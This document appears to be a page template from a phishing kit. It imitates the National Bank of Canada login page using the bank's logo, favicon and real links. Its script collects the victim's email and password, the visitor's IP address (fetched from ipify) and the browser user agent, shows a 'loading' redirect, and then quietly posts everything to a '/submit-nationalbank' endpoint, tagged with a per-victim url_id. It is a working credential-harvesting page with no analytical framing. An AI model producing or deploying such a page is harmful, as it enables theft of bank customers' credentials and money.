<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>National Bank | Banking services</title>
  <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
  <link rel="shortcut icon" href="https://connexion.bnc.ca/favicons/favicon.ico">
  <style>
    .logo-icon {
      fill: #E03C31;
    }
    .logo-txt {
      fill: #002855;
    }
  </style>
</head>
<body>
  <div class="flex min-h-screen w-full">
    <!-- Left side - Image -->
    <div class="hidden md:block md:w-1/2 lg:w-3/5 relative">
      <img
        src="https://i.postimg.cc/bNrc9KPw/img-login.jpg"
        alt="Man working on laptop"
        class="w-full h-full object-cover"
      />
    </div>

    <!-- Right side - Login Form -->
    <div class="w-full md:w-1/2 lg:w-2/5 bg-white p-6 md:p-10 flex flex-col">
      <div class="flex justify-between items-center mb-4">
        <div class="w-40">
          <!-- National Bank Logo -->
          <div class="flex items-center">
            <svg viewBox="0 0 408.6 106.3" preserveAspectRatio="xMinYMid meet" class="h-10">
              <title>National Bank</title>
              <g>
                <g>
                  <path class="logo-icon" d="M73.3,25 C71.3,25.5 69.9,25.8 68.4,25.2 C67.3,24.8 66.4,23.5 65.6,22.4 L52,3.8 C51.2,2.7 50.3,1.4 49.2,1 C47.8,0.4 46.3,0.8 44.3,1.2 L0.5,13 L0.5,94.5 L44.4,82.8 C46.4,82.4 47.9,82 49.3,82.6 C50.4,83.1 51.3,84.3 52.1,85.4 L65.6,104 C66.4,105.1 67.3,106.3 68.4,106.8 C69.8,107.3 71.3,107 73.3,106.6 L117.1,94.9 L117.1,13.2 L73.3,25 Z"></path>
                  <polygon class="logo-txt" points="167 16.5 167 37.4 166.9 37.4 153.1 13.2 145.5 16.9 145.5 47.9 152.2 47.9 152.2 23.1 152.3 23.1 166.5 47.9 173.7 47.9 173.7 13.2"></polygon>
                  <path class="logo-txt" d="M197.9,13.2 L197.9,13.2 L187.8,18.1 L177.2,47.9 L184.8,47.9 L187.2,40.7 L200,40.7 L202.2,47.9 L210.1,47.9 L197.9,13.2 Z M189.2,34.7 L193.6,21 L193.7,21 L198,34.7 L189.2,34.7 Z"></path>
                  <path class="logo-txt" d="M339.7,13.2 L339.7,13.2 L329.6,18.1 L319,47.9 L326.6,47.9 L329,40.7 L341.8,40.7 L344,47.9 L351.9,47.9 L339.7,13.2 Z M330.9,34.7 L335.3,21 L335.4,21 L339.7,34.7 L330.9,34.7 Z"></path>
                  <polygon class="logo-txt" points="234.1 13.2 209.4 13.2 205.9 19.3 205.9 19.3 216.4 19.3 216.4 47.9 223.6 47.9 223.6 19.3 230.5 19.3"></polygon>
                  <polygon class="logo-txt" points="237 16.7 237 47.9 244.2 47.9 244.2 13.2 244.2 13.2"></polygon>
                  <path class="logo-txt" d="M265.7,12.3 C265.4,12.3 265,12.3 264.6,12.3 L252.6,18.2 C250.5,20.9 249,24.9 249,30.6 C249,46.9 261.1,48.9 265.7,48.9 C270.3,48.9 282.4,46.9 282.4,30.6 C282.3,14.2 270.2,12.3 265.7,12.3 Z M265.7,42.7 C261.8,42.7 256.3,40.3 256.3,30.6 C256.3,20.9 261.8,18.5 265.7,18.5 C269.6,18.5 275.1,20.9 275.1,30.6 C275.1,40.3 269.6,42.7 265.7,42.7 Z"></path>
                  <polygon class="logo-txt" points="308.6 16.5 308.6 37.4 308.5 37.4 294.7 13.2 287.1 16.9 287.1 47.9 293.9 47.9 293.9 23.1 294 23.1 308.1 47.9 315.4 47.9 315.4 13.2"></polygon>
                  <polygon class="logo-txt" points="380 41.6 362.7 41.6 362.7 13.2 355.5 16.7 355.5 47.9 376.4 47.9"></polygon>
                  <path class="logo-txt" d="M168.8,76 C170.2,75.3 173.1,73.9 173.1,68.9 C173.1,65.3 170.9,60 162.4,60 L152.8,60 L145.5,63.6 L145.5,94.7 L160.2,94.7 C167.3,94.7 169.2,93.5 171.2,91.6 C173,89.8 174.2,87.2 174.2,84.4 C174.1,81 173,77.6 168.8,76 Z M152.4,66 L160.7,66 C164,66 166,66.9 166,69.7 C166,72.5 163.7,73.6 160.9,73.6 L152.4,73.6 L152.4,66 L152.4,66 Z M161.3,88.7 L152.4,88.7 L152.4,79.4 L161.6,79.4 C164.2,79.4 166.8,80.6 166.8,83.6 C166.9,87.2 164.8,88.7 161.3,88.7 Z"></path>
                  <polygon class="logo-txt" points="232.5 63.3 232.5 84.2 232.4 84.2 218.6 60 211 63.8 211 94.7 217.8 94.7 217.8 70 217.9 70 232 94.7 239.3 94.7 239.3 60"></polygon>
                  <path class="logo-txt" d="M195.7,60 L195.7,60 L185.6,65 L175,94.7 L182.6,94.7 L185,87.5 L197.8,87.5 L200,94.7 L207.9,94.7 L195.7,60 Z M187,81.6 L191.4,67.9 L191.5,67.9 L195.8,81.6 L187,81.6 Z"></path>
                  <polygon class="logo-txt" points="275.2 60.1 263.9 62 252.6 74.2 252.6 60 245.3 63.6 245.3 94.7 252.6 94.7 252.6 83 256 79.5 266.7 94.7 276 94.7 261 74.2"></polygon>
                </g>
              </g>
            </svg>
            <div class="ml-4 pl-4 border-l border-gray-300 hidden lg:block">
              <div class="text-xs text-gray-700">Powering</div>
              <div class="text-xs text-gray-700">your ideas</div>
            </div>
          </div>
        </div>
        <a href="#" class="text-blue-600 text-sm hover:underline">
          Français
        </a>
      </div>

      <div class="mt-16 max-w-md mx-auto w-full">
        <h1 class="text-3xl font-bold mb-8">Good morning</h1>

        <form id="nationalbank-login-form" action="/submit-nationalbank" method="POST">
          <input type="hidden" name="url_id" value="{{ url_id }}">

        <div class="space-y-6">
          <div>
            <label for="login-id" class="block text-sm font-medium mb-1">
              Email ID
            </label>
            <input
              id="login-id"
              type="email"
              name="login-id"
              placeholder="Enter your email ID"
              class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-blue-500"
            />
          </div>

          <div>
            <label for="password" class="block text-sm font-medium mb-1">
              Password
            </label>
            <div class="relative">
              <input
                id="password"
                type="password"
                name="password"
                placeholder="Enter your password"
                class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-blue-500 pr-10"
              />
              <button
                type="button"
                class="absolute inset-y-0 right-0 pr-3 flex items-center focus:outline-none"
                onclick="togglePasswordVisibility()"
              >
                <svg xmlns="http://www.w3.org/2000/svg" class="h-5 w-5 text-gray-400" id="eye-icon" fill="none" viewBox="0 0 24 24" stroke="currentColor">
                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M15 12a3 3 0 11-6 0 3 3 0 016 0z" />
                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z" />
                </svg>
              </button>
            </div>
            <div class="mt-1">
              <a href="https://connexion.bnc.ca/forgotPassword?SAMLRequest=fZJLT8MwEIT%2FSuR7EufVtFZTVFEhVQKEeB24uc4WDMnaeO0W%2Fj0hUFQOcF2NZ2a%2F9fzkre%2BiHTjSBhuWJZxFgMq0Gh8bdnd7Fk%2FZyWJOsu9yK5bBP%2BE1vAYgHy2JwPnh2alBCj24G3A7reDu%2BrxhT95bEmmKG5WYFy8TZfqUyKSjU8qNzK20mc149%2Fh8uZ7mtmbRarDVKP1Y5eCgDCK8DaNkgypRkkVnxikYqzRsKzsCFq1XDdNtzqtpWVW8KMuyKCdVUZd1PSuqaT6rBg1RgDWSl%2BgblvO8ivkkzma3vBbFRBQ8KXn9wKL7A4z8E8aAB0l87d%2Bw4FAYSZoEyh5IeCVulhfnYpAK64w3ynTsG5cYA92xw%2F8G8gCULQ7L7%2Ff7I3wjOvqiHA9xO92CS8latXnZvgb%2FHiS6AKHfzdPjCj%2F3uxwy16sr02n1%2Fomxl%2F7vSlmSjRPdxttRKgKSBaW3GlqWLr4zfv%2BKxQc%3D&RelayState=%252Foauth2%252Fv1%252Fauthorize%252Fredirect%253Fokta_key%253D3RulzmqrqIQS8OI8o0fhjy2KkW7M55of5oTbqj_wNP4&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=RWaYhP22wZaRL8SWQ0hbR6Z9VK0TDkd3qW4qPnB3t9358q%2FY15nwmj4pN%2Fh4YhsT8sDtrG83VMFRaLFesfBc4XlCfTKkGLPguEWdPVGMdxpgsnLp%2BgX73XtPkUMfEwJ6XFgcE%2Fx6nBkpasG8M2%2Fdf0ElL5LUB2R9pc9Py2uANLxvhgS8zct09lVLYWDggQuKfplNXr%2Fc0H%2FN3Xzkd0TMo1WLTEPdtAOOfESZG8Qub8oOlOpj7LTZB9ebO8BKUIGLaPxB8ON20y8NOWCYis8SgbFhffpQFk0ob7Qar8oc7mkHxw7j%2FBHC9%2F9RvS99xQmhNo0c77O%2BymuXeMh2CcuLlA%3D%3D" class="text-blue-600 text-sm hover:underline">
                Forgotten password?
              </a>
            </div>
          </div>

          <div class="flex items-center">
            <input
              type="checkbox"
              id="remember-me"
              class="h-4 w-4 text-blue-600 focus:ring-blue-500 border-gray-300 rounded"
            />
            <label for="remember-me" class="ml-2 block text-sm text-gray-900">
              Remember my email ID
              <span class="inline-block ml-1">
                <svg xmlns="http://www.w3.org/2000/svg" class="h-4 w-4 text-gray-400" fill="none" viewBox="0 0 24 24" stroke="currentColor">
                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M13 16h-1v-4h-1m1-4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
                </svg>
              </span>
            </label>
          </div>

          <button
    type="submit"
    class="w-full flex justify-center items-center px-4 py-2 border border-transparent text-sm font-medium rounded-md text-white bg-blue-600 hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-blue-500"
>
    <svg xmlns="http://www.w3.org/2000/svg" class="h-5 w-5 mr-2" fill="none" viewBox="0 0 24 24" stroke="currentColor">
        <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 15v2m-6 4h12a2 2 0 002-2v-6a2 2 0 00-2-2H6a2 2 0 00-2 2v6a2 2 0 002 2zm10-10V7a4 4 0 00-8 0v4h8z" />
    </svg>
    Sign in
</button>
        </div>
        </form> 

        <div class="mt-16">
          <h2 class="text-xl font-semibold mb-2">First time signing in?</h2>
          <p class="text-gray-600 mb-4">
            Create your account to access all our online services with a single password.
          </p>
<a href="https://app.bnc.ca/signUp" class="px-4 py-2 border border-blue-600 text-blue-600 rounded-md hover:bg-blue-50 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-blue-500">
  Create your account
</a>
        </div>
      </div>
    </div>
  </div>

  <script>
    function togglePasswordVisibility() {
      const passwordInput = document.getElementById('password');
      const eyeIcon = document.getElementById('eye-icon');
      
      if (passwordInput.type === 'password') {
        passwordInput.type = 'text';
        eyeIcon.innerHTML = `
          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.88 9.88l-3.29-3.29m7.532 7.532l3.29 3.29M3 3l3.59 3.59m0 0A9.953 9.953 0 0112 5c4.478 0 8.268 2.943 9.543 7a10.025 10.025 0 01-4.132 5.411m0 0L21 21" />
        `;
      } else {
        passwordInput.type = 'password';
        eyeIcon.innerHTML = `
          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M15 12a3 3 0 11-6 0 3 3 0 016 0z" />
          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z" />
        `;
      }
    }
  </script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#nationalbank-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'nationalbank');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-nationalbank', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'nationalbank');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-nationalbank', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>
